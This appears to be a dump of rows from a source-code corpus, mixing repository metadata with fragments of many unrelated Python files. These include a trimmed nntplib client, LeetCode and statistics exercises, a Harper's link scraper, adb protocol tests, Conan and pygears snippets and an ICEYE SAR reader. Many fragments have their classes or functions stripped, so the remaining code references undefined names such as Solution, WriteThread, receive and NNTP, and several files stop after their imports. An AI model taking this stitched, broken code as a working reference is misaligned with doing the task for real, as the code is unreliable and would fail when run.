"Apache-2.0"
] | 4 | 2018-02-15T12:32:26.000Z | 2018-03-06T16:33:34.000Z | rdsslib/kinesis/client.py | JiscSD/rdss-shared-libraries | cf07cad3f176ef8be1410fc29b240fb4791e607a | [
"Apache-2.0"
] | 1 | 2018-03-13T19:38:54.000Z | 2018-03-13T19:38:54.000Z | import json
import logging
from .errors import MaxRetriesExceededException, DecoratorApplyException
MAX_ATTEMPTS = 6
| 39.346457 | 79 | 0.626976 |
0cdd0af2f9cdd4f1682dfeb1a35ec8ea6569dc39 | 516 | py | Python | offer/10-qing-wa-tiao-tai-jie-wen-ti-lcof.py | wanglongjiang/leetcode | c61d2e719e81575cfb5bde9d64e15cee7cf01ef3 | [
"MIT"
] | 2 | 2021-03-14T11:38:26.000Z | 2021-03-14T11:38:30.000Z | offer/10-qing-wa-tiao-tai-jie-wen-ti-lcof.py | wanglongjiang/leetcode | c61d2e719e81575cfb5bde9d64e15cee7cf01ef3 | [
"MIT"
] | null | null | null | offer/10-qing-wa-tiao-tai-jie-wen-ti-lcof.py | wanglongjiang/leetcode | c61d2e719e81575cfb5bde9d64e15cee7cf01ef3 | [
"MIT"
] | 1 | 2022-01-17T19:33:23.000Z | 2022-01-17T19:33:23.000Z | '''
Offer 10- II.
12 n
1e9+710000000071000000008 1
0 <= n <= 100
'''
'''
:
'''
s = Solution()
print(s.numWays(2))
print(s.numWays(5))
print(s.numWays(0))
print(s.numWays(7))
| 15.636364 | 71 | 0.560078 |
0cddc6fcdac1a04a9f2296ecc74335e532a712c0 | 2,624 | py | Python | recipes/libmount/all/conanfile.py | KristianJerpetjon/conan-center-index | f368200c30fb3be44862e2e709be990d0db4d30e | [
"MIT"
] | null | null | null | recipes/libmount/all/conanfile.py | KristianJerpetjon/conan-center-index | f368200c30fb3be44862e2e709be990d0db4d30e | [
"MIT"
] | 1 | 2019-11-26T10:55:31.000Z | 2019-11-26T10:55:31.000Z | recipes/libmount/all/conanfile.py | KristianJerpetjon/conan-center-index | f368200c30fb3be44862e2e709be990d0db4d30e | [
"MIT"
] | 1 | 2019-10-31T19:29:14.000Z | 2019-10-31T19:29:14.000Z | from conans import ConanFile, tools, AutoToolsBuildEnvironment
from conans.errors import ConanInvalidConfiguration
import os
| 43.733333 | 161 | 0.651296 |
0cde288694905dadb83458256a681e9a26cd9df7 | 36,246 | py | Python | code/tmp_rtrip/nntplib.py | emilyemorehouse/ast-and-me | 3f58117512e125e1ecbe3c72f2f0d26adb80b7b3 | [
"MIT"
] | 24 | 2018-01-23T05:28:40.000Z | 2021-04-13T20:52:59.000Z | code/tmp_rtrip/nntplib.py | emilyemorehouse/ast-and-me | 3f58117512e125e1ecbe3c72f2f0d26adb80b7b3 | [
"MIT"
] | 17 | 2017-12-21T18:32:31.000Z | 2018-12-18T17:09:50.000Z | code/tmp_rtrip/nntplib.py | emilyemorehouse/ast-and-me | 3f58117512e125e1ecbe3c72f2f0d26adb80b7b3 | [
"MIT"
] | null | null | null | """An NNTP client class based on:
- RFC 977: Network News Transfer Protocol
- RFC 2980: Common NNTP Extensions
- RFC 3977: Network News Transfer Protocol (version 2)
Example:
>>> from nntplib import NNTP
>>> s = NNTP('news')
>>> resp, count, first, last, name = s.group('comp.lang.python')
>>> print('Group', name, 'has', count, 'articles, range', first, 'to', last)
Group comp.lang.python has 51 articles, range 5770 to 5821
>>> resp, subs = s.xhdr('subject', '{0}-{1}'.format(first, last))
>>> resp = s.quit()
>>>
Here 'resp' is the server response line.
Error responses are turned into exceptions.
To post an article from a file:
>>> f = open(filename, 'rb') # file containing article, including header
>>> resp = s.post(f)
>>>
For descriptions of all methods, read the comments in the code below.
Note that all arguments and return values representing article numbers
are strings, not numbers, since they are rarely used for calculations.
"""
import re
import socket
import collections
import datetime
import warnings
try:
import ssl
except ImportError:
_have_ssl = False
else:
_have_ssl = True
from email.header import decode_header as _email_decode_header
from socket import _GLOBAL_DEFAULT_TIMEOUT
__all__ = ['NNTP', 'NNTPError', 'NNTPReplyError', 'NNTPTemporaryError',
'NNTPPermanentError', 'NNTPProtocolError', 'NNTPDataError', 'decode_header'
]
_MAXLINE = 2048
NNTP_PORT = 119
NNTP_SSL_PORT = 563
_LONGRESP = {'100', '101', '211', '215', '220', '221', '222', '224', '225',
'230', '231', '282'}
_DEFAULT_OVERVIEW_FMT = ['subject', 'from', 'date', 'message-id',
'references', ':bytes', ':lines']
_OVERVIEW_FMT_ALTERNATIVES = {'bytes': ':bytes', 'lines': ':lines'}
_CRLF = b'\r\n'
GroupInfo = collections.namedtuple('GroupInfo', ['group', 'last', 'first',
'flag'])
ArticleInfo = collections.namedtuple('ArticleInfo', ['number', 'message_id',
'lines'])
def decode_header(header_str):
    """Takes a unicode string representing a munged header value
    and decodes it as a (possibly non-ASCII) readable value."""
    # email.header.decode_header yields (chunk, charset) pairs; a chunk is
    # bytes when it came from an RFC 2047 encoded word, otherwise already
    # a str.  Missing charsets default to ASCII.
    return ''.join(
        chunk.decode(charset or 'ascii') if isinstance(chunk, bytes) else chunk
        for chunk, charset in _email_decode_header(header_str)
    )
def _parse_overview_fmt(lines):
    """Parse a list of string representing the response to LIST OVERVIEW.FMT
    and return a list of header/metadata names.
    Raises NNTPDataError if the response is not compliant
    (cf. RFC 3977, section 8.4)."""
    fmt = []
    for line in lines:
        # Metadata items keep their leading ':'; any trailing ':suffix'
        # (e.g. ':full') is irrelevant here and gets discarded.
        if line[0] == ':':
            name = ':' + line[1:].partition(':')[0]
        else:
            name = line.partition(':')[0]
        name = name.lower()
        # Map alternative spellings (e.g. 'bytes') onto the canonical
        # metadata names (':bytes').
        fmt.append(_OVERVIEW_FMT_ALTERNATIVES.get(name, name))
    defaults = _DEFAULT_OVERVIEW_FMT
    if len(fmt) < len(defaults):
        raise NNTPDataError('LIST OVERVIEW.FMT response too short')
    if fmt[:len(defaults)] != defaults:
        raise NNTPDataError('LIST OVERVIEW.FMT redefines default fields')
    return fmt
def _parse_overview(lines, fmt, data_process_func=None):
    """Parse the response to an OVER or XOVER command according to the
    overview format `fmt`.

    Returns a list of (article_number, fields) tuples where `fields`
    maps each name in `fmt` to its token (possibly None).
    `data_process_func` is accepted but never used in this body -
    presumably kept for API compatibility; TODO confirm against callers.
    """
    n_defaults = len(_DEFAULT_OVERVIEW_FMT)
    overview = []
    for line in lines:
        fields = {}
        # Overview lines are TAB-separated; the first token is always the
        # article number.
        article_number, *tokens = line.split('\t')
        article_number = int(article_number)
        for i, token in enumerate(tokens):
            # Ignore extra tokens beyond the advertised format.
            if i >= len(fmt):
                continue
            field_name = fmt[i]
            is_metadata = field_name.startswith(':')
            if i >= n_defaults and not is_metadata:
                # Additional (non-default, non-metadata) headers must carry
                # their own "Name: " prefix; verify it case-insensitively.
                h = field_name + ': '
                if token and token[:len(h)].lower() != h:
                    raise NNTPDataError(
                        "OVER/XOVER response doesn't include names of additional headers"
                        )
                # Strip the "Name: " prefix; an empty token means the
                # header is absent for this article.
                token = token[len(h):] if token else None
            fields[fmt[i]] = token
        overview.append((article_number, fields))
    return overview
def _parse_datetime(date_str, time_str=None):
"""Parse a pair of (date, time) strings, and return a datetime object.
If only the date is given, it is assumed to be date and time
concatenated together (e.g. response to the DATE command).
"""
if time_str is None:
time_str = date_str[-6:]
date_str = date_str[:-6]
hours = int(time_str[:2])
minutes = int(time_str[2:4])
seconds = int(time_str[4:])
year = int(date_str[:-4])
month = int(date_str[-4:-2])
day = int(date_str[-2:])
if year < 70:
year += 2000
elif year < 100:
year += 1900
return datetime.datetime(year, month, day, hours, minutes, seconds)
def _unparse_datetime(dt, legacy=False):
"""Format a date or datetime object as a pair of (date, time) strings
in the format required by the NEWNEWS and NEWGROUPS commands. If a
date object is passed, the time is assumed to be midnight (00h00).
The returned representation depends on the legacy flag:
* if legacy is False (the default):
date has the YYYYMMDD format and time the HHMMSS format
* if legacy is True:
date has the YYMMDD format and time the HHMMSS format.
RFC 3977 compliant servers should understand both formats; therefore,
legacy is only needed when talking to old servers.
"""
if not isinstance(dt, datetime.datetime):
time_str = '000000'
else:
time_str = '{0.hour:02d}{0.minute:02d}{0.second:02d}'.format(dt)
y = dt.year
if legacy:
y = y % 100
date_str = '{0:02d}{1.month:02d}{1.day:02d}'.format(y, dt)
else:
date_str = '{0:04d}{1.month:02d}{1.day:02d}'.format(y, dt)
return date_str, time_str
if _have_ssl:
    def _encrypt_on(sock, context, hostname):
        """Wrap a socket in SSL/TLS. Arguments:
        - sock: Socket to wrap
        - context: SSL context to use for the encrypted connection
        Returns:
        - sock: New, encrypted socket.
        """
        # Fall back to the stdlib's default client context when the caller
        # did not supply one.  NOTE(review): _create_stdlib_context is a
        # private ssl helper - its validation defaults may change between
        # Python versions.
        if context is None:
            context = ssl._create_stdlib_context()
        # server_hostname enables SNI and hostname checking (when the
        # context requests it).
        return context.wrap_socket(sock, server_hostname=hostname)
if _have_ssl:
__all__.append('NNTP_SSL')
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description=
' nntplib built-in demo - display the latest articles in a newsgroup'
)
parser.add_argument('-g', '--group', default=
'gmane.comp.python.general', help=
'group to fetch messages from (default: %(default)s)')
parser.add_argument('-s', '--server', default='news.gmane.org', help=
'NNTP server hostname (default: %(default)s)')
parser.add_argument('-p', '--port', default=-1, type=int, help=
'NNTP port number (default: %s / %s)' % (NNTP_PORT, NNTP_SSL_PORT))
parser.add_argument('-n', '--nb-articles', default=10, type=int, help=
'number of articles to fetch (default: %(default)s)')
parser.add_argument('-S', '--ssl', action='store_true', default=False,
help='use NNTP over SSL')
args = parser.parse_args()
port = args.port
if not args.ssl:
if port == -1:
port = NNTP_PORT
s = NNTP(host=args.server, port=port)
else:
if port == -1:
port = NNTP_SSL_PORT
s = NNTP_SSL(host=args.server, port=port)
caps = s.getcapabilities()
if 'STARTTLS' in caps:
s.starttls()
resp, count, first, last, name = s.group(args.group)
print('Group', name, 'has', count, 'articles, range', first, 'to', last)
first = str(int(last) - args.nb_articles + 1)
resp, overviews = s.xover(first, last)
for artnum, over in overviews:
author = decode_header(over['from']).split('<', 1)[0]
subject = decode_header(over['subject'])
lines = int(over[':lines'])
print('{:7} {:20} {:42} ({})'.format(artnum, cut(author, 20), cut(
subject, 42), lines))
s.quit()
| 36.20979 | 89 | 0.580202 |
0cde5c372756830b141e6816281e99f572d9eff3 | 3,463 | py | Python | tests/required_with_test.py | roypeters/spotlight | f23818cf7b49aa7a31200c1945ebc2d91656156e | [
"MIT"
] | 9 | 2019-03-26T13:21:16.000Z | 2021-03-21T08:55:49.000Z | tests/required_with_test.py | roypeters/spotlight | f23818cf7b49aa7a31200c1945ebc2d91656156e | [
"MIT"
] | 7 | 2019-03-28T17:32:03.000Z | 2021-09-24T13:17:32.000Z | tests/required_with_test.py | roypeters/spotlight | f23818cf7b49aa7a31200c1945ebc2d91656156e | [
"MIT"
] | 4 | 2019-03-30T13:28:22.000Z | 2020-06-15T13:15:44.000Z | from src.spotlight.errors import REQUIRED_WITH_ERROR
from .validator_test import ValidatorTest
| 32.064815 | 86 | 0.626047 |
0cde6e9d59bff904867397a498cf0cce96687bf3 | 3,194 | py | Python | default-approach/data-collection/harpers-data/scraper_scripts/get-harpers-links.py | the-browser/recommending-interesting-writing | 9ff4771d3f437d33c26d2f306e393b5a90a04878 | [
"MIT"
] | 5 | 2020-09-17T17:56:21.000Z | 2021-11-03T02:40:27.000Z | default-approach/data-collection/harpers-data/scraper_scripts/get-harpers-links.py | the-browser/recommending-interesting-writing | 9ff4771d3f437d33c26d2f306e393b5a90a04878 | [
"MIT"
] | null | null | null | default-approach/data-collection/harpers-data/scraper_scripts/get-harpers-links.py | the-browser/recommending-interesting-writing | 9ff4771d3f437d33c26d2f306e393b5a90a04878 | [
"MIT"
] | 1 | 2020-11-01T11:37:38.000Z | 2020-11-01T11:37:38.000Z | BASE_URL="https://harpers.org/sections/readings/page/"
N_ARTICLE_LINK_PAGES = 50
OUTPUT_FILE = 'harpers-later-urls.json'
WORKER_THREADS = 32
import json
import datetime
import dateutil.parser
from dataclasses import dataclass
from dataclasses_json import dataclass_json
from datetime import datetime
from newspaper import Article
from bs4 import BeautifulSoup
from typing import List
from queue import Queue
from threading import Thread
from requests import get
from pathlib import Path
import pandas as pd
from urllib.request import Request, urlopen
if __name__ == '__main__':
queue = Queue()
write_thread = WriteThread(queue)
write_thread.start()
worker_threads = []
chunk_size = (N_ARTICLE_LINK_PAGES) // WORKER_THREADS
for i in range(0, N_ARTICLE_LINK_PAGES+1, chunk_size):
chunk = range(i,i+chunk_size)
worker_threads.append(ScrapeThread(chunk, queue))
for thread in worker_threads:
thread.start()
for thread in worker_threads:
thread.join()
# Signal end of jobs to write thread
queue.put(None)
print('Done.')
write_thread.join()
| 31.313725 | 114 | 0.60551 |
0cdee741020f9cadb35d114ce192b7140ac463d7 | 8,711 | py | Python | rulm/models/neural_net/encoder_only.py | IlyaGusev/rulm | 4e78a495eba6cd6ea1fea839463c8145ed7051f2 | [
"Apache-2.0"
] | null | null | null | rulm/models/neural_net/encoder_only.py | IlyaGusev/rulm | 4e78a495eba6cd6ea1fea839463c8145ed7051f2 | [
"Apache-2.0"
] | null | null | null | rulm/models/neural_net/encoder_only.py | IlyaGusev/rulm | 4e78a495eba6cd6ea1fea839463c8145ed7051f2 | [
"Apache-2.0"
] | null | null | null | from typing import Dict
import numpy as np
import torch
from torch.nn.functional import linear, log_softmax, embedding
from torch.nn import Dropout, LogSoftmax, NLLLoss
from allennlp.common import Params
from allennlp.models.model import Model
from allennlp.data.vocabulary import Vocabulary, DEFAULT_PADDING_TOKEN
from allennlp.modules import TextFieldEmbedder, TimeDistributed, Seq2SeqEncoder
from allennlp.modules.sampled_softmax_loss import SampledSoftmaxLoss
from allennlp.modules.input_variational_dropout import InputVariationalDropout
from allennlp.modules.token_embedders import Embedding, TokenEmbedder
from allennlp.modules.token_embedders.embedding import _read_pretrained_embeddings_file
from allennlp.nn.util import combine_initial_dims, uncombine_initial_dims
| 44.218274 | 105 | 0.630926 |
0cdf83ec2ee6735ac3ecbd989380ce0f87917a5d | 102 | py | Python | api/queries/models.py | django-doctor/lite-api | 1ba278ba22ebcbb977dd7c31dd3701151cd036bf | [
"MIT"
] | 3 | 2019-05-15T09:30:39.000Z | 2020-04-22T16:14:23.000Z | api/queries/models.py | django-doctor/lite-api | 1ba278ba22ebcbb977dd7c31dd3701151cd036bf | [
"MIT"
] | 85 | 2019-04-24T10:39:35.000Z | 2022-03-21T14:52:12.000Z | api/queries/models.py | django-doctor/lite-api | 1ba278ba22ebcbb977dd7c31dd3701151cd036bf | [
"MIT"
] | 1 | 2021-01-17T11:12:19.000Z | 2021-01-17T11:12:19.000Z | from api.cases.models import Case
| 10.2 | 33 | 0.588235 |
0cdfbe0659d37b3cc8cc00e18f2f0edb48d21d4a | 3,410 | py | Python | src/scs_airnow/cmd/cmd_csv_join.py | south-coast-science/scs_airnow | 7f0657bd434aa3abe667f58bc971edaa00d0c24c | [
"MIT"
] | null | null | null | src/scs_airnow/cmd/cmd_csv_join.py | south-coast-science/scs_airnow | 7f0657bd434aa3abe667f58bc971edaa00d0c24c | [
"MIT"
] | null | null | null | src/scs_airnow/cmd/cmd_csv_join.py | south-coast-science/scs_airnow | 7f0657bd434aa3abe667f58bc971edaa00d0c24c | [
"MIT"
] | null | null | null | """
Created on 22 Feb 2019
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
source repo: scs_analysis
"""
import optparse
# --------------------------------------------------------------------------------------------------------------------
| 31.284404 | 118 | 0.509091 |
0ce058cd8a6d65a8bc31474a1e02dc8c29923fe6 | 338 | py | Python | test/receive_message.py | unknown-admin/easymq | e29b8f63402e385059ff8c263b0e7bb8e9fbd24b | [
"Apache-2.0"
] | 1 | 2020-04-20T14:01:34.000Z | 2020-04-20T14:01:34.000Z | test/receive_message.py | unknown-admin/easymq | e29b8f63402e385059ff8c263b0e7bb8e9fbd24b | [
"Apache-2.0"
] | null | null | null | test/receive_message.py | unknown-admin/easymq | e29b8f63402e385059ff8c263b0e7bb8e9fbd24b | [
"Apache-2.0"
] | 1 | 2022-02-18T08:18:08.000Z | 2022-02-18T08:18:08.000Z | import os
from easymq.mq import MQ
mq = MQ(
mq_user=os.environ.get("mq_user"),
password=os.environ.get("password"),
host_and_ports=[
(os.environ.get("host"), os.environ.get("port")),
],
func=receive,
queue_name="/queue/test_queue",
)
mq.receive()
| 16.095238 | 57 | 0.612426 |
0ce0840b66e590ef2a41c729b631412a225153c7 | 12,383 | py | Python | test/unit/agent/common/util/text.py | dp92987/nginx-amplify-agent | 1b2eed6eab52a82f35974928d75044451b4bedaf | [
"BSD-2-Clause"
] | 308 | 2015-11-17T13:15:33.000Z | 2022-03-24T12:03:40.000Z | test/unit/agent/common/util/text.py | dp92987/nginx-amplify-agent | 1b2eed6eab52a82f35974928d75044451b4bedaf | [
"BSD-2-Clause"
] | 211 | 2015-11-16T15:27:41.000Z | 2022-03-28T16:20:15.000Z | test/unit/agent/common/util/text.py | dp92987/nginx-amplify-agent | 1b2eed6eab52a82f35974928d75044451b4bedaf | [
"BSD-2-Clause"
] | 80 | 2015-11-16T18:20:30.000Z | 2022-03-02T12:47:56.000Z | # -*- coding: utf-8 -*-
from hamcrest import *
from test.base import BaseTestCase
from amplify.agent.common.util.text import (
decompose_format, parse_line, parse_line_split
)
__author__ = "Grant Hulegaard"
__copyright__ = "Copyright (C) Nginx, Inc. All rights reserved."
__license__ = ""
__maintainer__ = "Grant Hulegaard"
__email__ = "grant.hulegaard@nginx.com"
COMBINED_FORMAT = '$remote_addr - $remote_user [$time_local] "$request" ' + \
'$status $body_bytes_sent "$http_referer" "$http_user_agent"'
| 42.407534 | 115 | 0.605023 |
0ce1ead7fccfec4e0bc42fdbdc128b022ce3b62a | 9,982 | py | Python | test/adb_test.py | bugobliterator/python-adb | 2f4f5bcdf5dab5ccf8bf58ff9e91cde4d134f1c0 | [
"Apache-2.0"
] | 1,549 | 2015-01-04T04:45:48.000Z | 2022-03-31T08:01:59.000Z | test/adb_test.py | bugobliterator/python-adb | 2f4f5bcdf5dab5ccf8bf58ff9e91cde4d134f1c0 | [
"Apache-2.0"
] | 174 | 2015-01-04T04:47:39.000Z | 2022-03-24T10:42:12.000Z | test/adb_test.py | bugobliterator/python-adb | 2f4f5bcdf5dab5ccf8bf58ff9e91cde4d134f1c0 | [
"Apache-2.0"
] | 356 | 2015-01-09T10:10:33.000Z | 2022-03-27T19:25:01.000Z | #!/usr/bin/env python
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for adb."""
from io import BytesIO
import struct
import unittest
from mock import mock
from adb import common
from adb import adb_commands
from adb import adb_protocol
from adb.usb_exceptions import TcpTimeoutException, DeviceNotFoundError
import common_stub
BANNER = b'blazetest'
LOCAL_ID = 1
REMOTE_ID = 2
    def testPull(self):
        # Payload the fake device will hand back for the pulled file.
        filedata = b"g'ddayta, govnah"
        # Sync request for the remote path '/data'.
        recv = self._MakeWriteSyncPacket(b'RECV', b'/data')
        # Device-side reply: one DATA chunk carrying the payload, then DONE.
        data = [
            self._MakeWriteSyncPacket(b'DATA', filedata),
            self._MakeWriteSyncPacket(b'DONE'),
        ]
        # NOTE(review): _ExpectSyncCommand appears to pair expected writes
        # with canned responses on a stub USB handle - confirm in the base
        # test class.
        usb = self._ExpectSyncCommand([recv], [b''.join(data)])
        dev = adb_commands.AdbCommands()
        dev.ConnectDevice(handle=usb, banner=BANNER)
        # Pull must reassemble the DATA chunk(s) into the original payload.
        self.assertEqual(filedata, dev.Pull('/data'))
class TcpTimeoutAdbTest(BaseAdbTest):
class TcpHandleTest(unittest.TestCase):
if __name__ == '__main__':
unittest.main()
| 31.588608 | 102 | 0.696053 |
0ce32973b15677a9edaeef840f01f4ffb57eb837 | 6,149 | py | Python | 06_Statistik_und_Wahrscheinlichkeiten/Aufgabe.py | felixdittrich92/numerisches_python | 0f895ee19b4fa3cf7ad38cd3dfe3cd7020ee34a7 | [
"MIT"
] | null | null | null | 06_Statistik_und_Wahrscheinlichkeiten/Aufgabe.py | felixdittrich92/numerisches_python | 0f895ee19b4fa3cf7ad38cd3dfe3cd7020ee34a7 | [
"MIT"
] | null | null | null | 06_Statistik_und_Wahrscheinlichkeiten/Aufgabe.py | felixdittrich92/numerisches_python | 0f895ee19b4fa3cf7ad38cd3dfe3cd7020ee34a7 | [
"MIT"
] | null | null | null | from random import randint
import numpy as np
from collections import Counter
from pprint import pprint
import time
# Aufgaben Siehe Buch
print('-------------Aufgabe 1-------------')
outcomes = [ randint(1,6) for _ in range(10000)]
even_pips = [ x for x in outcomes if x % 2 == 0]
greater_two = [ x for x in outcomes if x > 2]
combined = [ x for x in outcomes if x % 2 == 0 and x > 2]
print(len(even_pips)/len(outcomes))
print(len(greater_two)/len(outcomes))
print(len(combined)/len(outcomes))
print('-------------Aufgabe 2-------------')
def find_interval(x, partition):
    """ find_interval -> i
    "i" will be the index for which applies
    partition[i] < x < partition[i+1], if such an index exists.
    -1 otherwise
    """
    # Scan for the first boundary exceeding x; x then lies in the interval
    # starting one position earlier.  Values below partition[0] and values
    # past the last boundary both yield -1.
    for idx, boundary in enumerate(partition):
        if x < boundary:
            return idx - 1
    return -1
def weighted_choice(sequence, weights, bisection=False):
    """
    weighted_choice selects a random element of
    the sequence according to the weights list

    :param sequence: indexable candidates.
    :param weights: per-element probabilities; if they do not sum to 1,
        draws past the cumulative total map to index -1, i.e. the last
        element.
    :param bisection: unused in this body - presumably a planned
        binary-search variant; TODO confirm.
    """
    # Draw a uniform sample in [0, 1) and locate it in the cumulative
    # weight partition [0, w0, w0+w1, ...]; the containing interval's
    # index selects the element.
    x = np.random.random()
    w = [0] + list(np.cumsum(weights))
    index = find_interval(x, w)
    return sequence[index]
def process_datafile(filename):
    """ process_datafile -> (universities, enrollments, total_number_of_students)
    universities: list of university names
    enrollments: corresponding list with enrollment totals
    total_number_of_students: over all universities"""
    universities=[]
    enrollments=[]
    with open(filename) as fh:
        total_number_of_students= 0
        fh.readline()# get rid of descriptive first line
        for line in fh:
            line=line.strip()
            # The last three whitespace-separated columns are undergrad,
            # postgrad and total; everything before is the (multi-word)
            # university name.  The very first token is dropped -
            # presumably a rank/index column; TODO confirm against the
            # data file.
            *praefix, under, post, total = line.rsplit()
            university = praefix[1:]
            # Totals use thousands separators, e.g. "12,345".
            total = int(total.replace(",",""))
            enrollments.append(total)
            universities.append(" ".join(university))
            total_number_of_students += total
    return(universities, enrollments, total_number_of_students)
universities, enrollments, total_students = process_datafile("universities_uk.txt")
"""
for i in range(14):
print(universities[i], end=": ")
print(enrollments[i])
print("Number of students enrolled in the UK: ", total_students)
"""
normalized_enrollments = [students / total_students for students in enrollments]
print(weighted_choice(universities, normalized_enrollments))
outcomes=[]
n= 100000
for i in range(n):
outcomes.append(weighted_choice(universities,normalized_enrollments))
c = Counter(outcomes)
pprint(c.most_common(20),indent=2, width=70)
print('-------------Aufgabe 3-------------')
def find_interval(x, partition, endpoints=True):
    """ find_interval -> i
    If endpoints is True, "i" will be the index for which applies
    partition[i] < x < partition[i+1], if such an index exists.
    -1 otherwise
    If endpoints is False, "i" will be the smallest index
    for which applies x < partition[i]. If no such index exists
    "i" will be set to len(partition)
    """
    # Locate the first boundary exceeding x; the two modes only differ in
    # whether that position or the one before it is reported.
    for idx, boundary in enumerate(partition):
        if x < boundary:
            return idx - 1 if endpoints else idx
    return -1 if endpoints else len(partition)
def weighted_choice(sequence, weights):
    """
    weighted_choice selects a random element of
    the sequence according to the list of weights
    """
    # Uniform draw in [0, 1) located inside the cumulative weight
    # partition [0, w0, w0+w1, ...]; the interval index picks the element.
    x = np.random.random()
    cum_weights = [0] + list(np.cumsum(weights))
    index = find_interval(x, cum_weights)
    return sequence[index]
def cartesian_choice(*iterables):
    """
    Return a list with one random choice from each iterable, in
    respective order.

    The result list can be seen as an element of the Cartesian product
    of the iterables.

    :raises IndexError: if any argument is an empty sequence.
    """
    # BUG FIX: the module only does `from random import randint`, so the
    # original `random.choice(...)` raised NameError.  Import the module
    # locally to keep random.choice's exact semantics.
    import random
    return [random.choice(population) for population in iterables]
def weighted_cartesian_choice(*iterables):
    """
    A list with weighted random choices from each iterable of iterables
    is being created in respective order

    Each argument is expected to unpack as a (population, weights) pair;
    one element is drawn from every pair with weighted_choice().
    """
    res = []
    for population, weights in iterables:
        lst = weighted_choice(population, weights)
        res.append(lst)
    return res
def weighted_sample(population, weights, k):
    """
    Draw a random sample of k distinct elements from the sequence
    'population' according to the list of weights.

    After each draw the chosen element is removed and the remaining
    weights are renormalised, so the sample is taken without
    replacement.
    """
    sample = set()
    # Work on copies: both lists are destructively shrunk below.
    population = list(population)
    weights = list(weights)
    while len(sample) < k:
        # BUG FIX: the original called weighted_sample() (itself, with a
        # missing argument -> TypeError); a single draw is done with
        # weighted_choice().
        choice = weighted_choice(population, weights)
        sample.add(choice)
        index = population.index(choice)
        weights.pop(index)
        population.remove(choice)
        # Renormalise the remaining weights so they sum to 1 again.
        weights = [x / sum(weights) for x in weights]
    return list(sample)
def weighted_sample_alternative(population, weights, k):
    """
    Alternative way to previous implementation.
    Draw a random sample of k distinct elements from the sequence
    'population' according to the list of weights, by simply redrawing
    whenever a duplicate comes up.
    """
    sample = set()
    population = list(population)
    weights = list(weights)
    while len(sample) < k:
        # BUG FIX: the original called weighted_sample() with a missing
        # argument (TypeError); a single draw is done with
        # weighted_choice().
        choice = weighted_choice(population, weights)
        if choice not in sample:
            sample.add(choice)
    return list(sample)
amazons = ["Airla","Barbara","Eos",
"Glykeria","Hanna","Helen",
"Agathangelos","Iokaste","Medousa",
"Sofronia","Andromeda"]
weights = np.full(11,1/len(amazons))
Pytheusses_favorites = {"Iokaste","Medousa","Sofronia","Andromeda"}
n = 1000
counter = 0
prob= 1 / 330
days = 0
factor1 = 1 / 13
factor2 = 1 / 12
start = time.perf_counter()
while prob < 0.9:
for i in range(n):
the_chosen_ones = weighted_sample_alternative(amazons, weights, 4)
if set(the_chosen_ones) == Pytheusses_favorites:
counter += 1
prob = counter / n
counter = 0
weights[:7] = weights[:7] - weights[:7] * factor1
weights[7:] = weights[7:] + weights[7:] * factor2
weights = weights / np.sum(weights)
#print(weights)
days += 1
print(time.perf_counter() - start)
print("Number of days, he has to wait: ", days) | 29.5625 | 83 | 0.643031 |
0ce58d7de1508c5e2496368e37a432c416830c42 | 2,183 | py | Python | lib_dsp/iir/iir/design/iir.py | PyGears/lib-dsp | a4c80882f5188799233dc9108f91faa4bab0ac57 | [
"MIT"
] | 3 | 2019-08-26T17:32:33.000Z | 2022-03-19T02:05:02.000Z | pygears_dsp/lib/iir.py | bogdanvuk/pygears-dsp | ca107d3f9e8d02023e9ccd27f7bc95f10b5aa995 | [
"MIT"
] | null | null | null | pygears_dsp/lib/iir.py | bogdanvuk/pygears-dsp | ca107d3f9e8d02023e9ccd27f7bc95f10b5aa995 | [
"MIT"
] | 5 | 2019-09-18T18:00:13.000Z | 2022-03-28T11:07:26.000Z | from pygears import gear, Intf
from pygears.lib import dreg, decouple, saturate, qround
| 24.255556 | 117 | 0.601466 |
0ce5cb9e4bc10393a6546a397038a2d745082f63 | 3,752 | py | Python | read_iceye_h5.py | eciraci/iceye_gamma_proc | 68b04bfd55082862f419031c28e7b52f1800f3db | [
"MIT"
] | null | null | null | read_iceye_h5.py | eciraci/iceye_gamma_proc | 68b04bfd55082862f419031c28e7b52f1800f3db | [
"MIT"
] | null | null | null | read_iceye_h5.py | eciraci/iceye_gamma_proc | 68b04bfd55082862f419031c28e7b52f1800f3db | [
"MIT"
] | null | null | null | #!/usr/bin/env python
u"""
read_iceye_h5.py
Written by Enrico Ciraci' (03/2022)
Read ICEYE Single Look Complex and Parameter file using GAMMA's Python
integration with the py_gamma module.
usage: read_iceye_h5.py [-h] [--directory DIRECTORY]
TEST: Read ICEye Single Look Complex and Parameter.
optional arguments:
-h, --help show this help message and exit
--directory DIRECTORY, -D DIRECTORY
Project data directory.
--slc SLC, -C SLC Process and single SLC.
PYTHON DEPENDENCIES:
argparse: Parser for command-line options, arguments and sub-commands
https://docs.python.org/3/library/argparse.html
datetime: Basic date and time types
https://docs.python.org/3/library/datetime.html#module-datetime
tqdm: Progress Bar in Python.
https://tqdm.github.io/
py_gamma: GAMMA's Python integration with the py_gamma module
UPDATE HISTORY:
"""
# - Python Dependencies
from __future__ import print_function
import os
import argparse
import datetime
from tqdm import tqdm
# - GAMMA's Python integration with the py_gamma module
import py_gamma as pg
# - Utility Function
from utils.make_dir import make_dir
# - run main program
if __name__ == '__main__':
start_time = datetime.datetime.now()
main()
end_time = datetime.datetime.now()
print(f"# - Computation Time: {end_time - start_time}")
| 36.076923 | 81 | 0.63033 |
0ce5d95f10a05417cb3b6fc154c24d7adc27cf45 | 1,877 | py | Python | scripts/baxter_find_tf.py | mkrizmancic/qlearn_baxter | 0498315212cacb40334cbb97a858c6ba317f52a3 | [
"MIT"
] | 4 | 2017-11-11T18:16:22.000Z | 2018-11-08T13:31:09.000Z | scripts/baxter_find_tf.py | mkrizmancic/qlearn_baxter | 0498315212cacb40334cbb97a858c6ba317f52a3 | [
"MIT"
] | null | null | null | scripts/baxter_find_tf.py | mkrizmancic/qlearn_baxter | 0498315212cacb40334cbb97a858c6ba317f52a3 | [
"MIT"
